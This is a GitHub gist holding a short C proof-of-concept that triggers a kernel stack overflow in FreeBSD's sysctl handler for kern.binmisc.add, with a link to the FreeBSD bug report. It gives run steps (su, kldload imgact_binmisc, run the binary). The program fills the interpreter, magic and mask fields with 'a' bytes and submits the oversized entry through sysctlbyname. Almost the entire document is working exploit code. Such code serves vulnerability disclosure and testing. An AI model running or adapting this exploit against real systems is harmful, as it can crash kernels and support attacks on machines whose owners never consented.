|
|
@@ -0,0 +1,64 @@ |
|
|
/* |
|
|
|
|
|
PoC for kernel stack overflow in sysctl handler for kern.binmisc.add: |
|
|
https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=206761#c0 |
|
|
|
|
|
su |
|
|
kldload imgact_binmisc |
|
|
./x |
|
|
|
|
|
- CTurt |
|
|
|
|
|
*/ |
|
|
|
|
|
#include <stdio.h> |
|
|
#include <string.h> |
|
|
#include <errno.h> |
|
|
#include <dlfcn.h> |
|
|
#include <sys/types.h> |
|
|
#include <sys/sysctl.h> |
|
|
//#include <sys/imgact_binmisc.h> |
|
|
|
|
|
#define MAXPATHLEN 1024 |
|
|
#define IBE_VERSION 1 |
|
|
#define IBE_ARG_LEN_MAX 256 |
|
|
#define IBE_NAME_MAX 32 |
|
|
#define IBE_INTERP_LEN_MAX (MAXPATHLEN + IBE_ARG_LEN_MAX) |
|
|
#define IBE_MAGIC_MAX 256 |
|
|
|
|
|
typedef struct ximgact_binmisc_entry { |
|
|
uint32_t xbe_version; /* Struct version(IBE_VERSION) */ |
|
|
uint32_t xbe_flags; /* Entry flags (IBF_*) */ |
|
|
uint32_t xbe_moffset; /* Magic offset in header */ |
|
|
uint32_t xbe_msize; /* Magic size */ |
|
|
uint32_t spare[3]; /* Spare fields for future use */ |
|
|
char xbe_name[IBE_NAME_MAX]; /* Unique interpreter name */ |
|
|
char xbe_interpreter[IBE_INTERP_LEN_MAX]; /* Interpreter path + args */ |
|
|
uint8_t xbe_magic[IBE_MAGIC_MAX]; /* Header Magic */ |
|
|
uint8_t xbe_mask[IBE_MAGIC_MAX]; /* Magic Mask */ |
|
|
} ximgact_binmisc_entry_t; |
|
|
|
|
|
ximgact_binmisc_entry_t xbe; |
|
|
|
|
|
int main(void) { |
|
|
int result = 0; |
|
|
errno = 0; |
|
|
|
|
|
xbe.xbe_version = IBE_VERSION; |
|
|
strcpy(xbe.xbe_name, "CTurt"); |
|
|
|
|
|
memset(&xbe.xbe_interpreter, 'a', IBE_INTERP_LEN_MAX); |
|
|
memset(&xbe.xbe_magic, 'a', IBE_MAGIC_MAX); |
|
|
memset(&xbe.xbe_mask, 'a', IBE_MAGIC_MAX); |
|
|
|
|
|
xbe.xbe_mask[IBE_MAGIC_MAX - 1] = 0; |
|
|
|
|
|
size_t size = sizeof(xbe); |
|
|
|
|
|
result = sysctlbyname("kern.binmisc.add", NULL, NULL, &xbe, size); |
|
|
|
|
|
printf("result %d\n", result); |
|
|
printf("errno %d\n", errno); |
|
|
|
|
|
return 0; |
|
|
} |
CTurt created this gist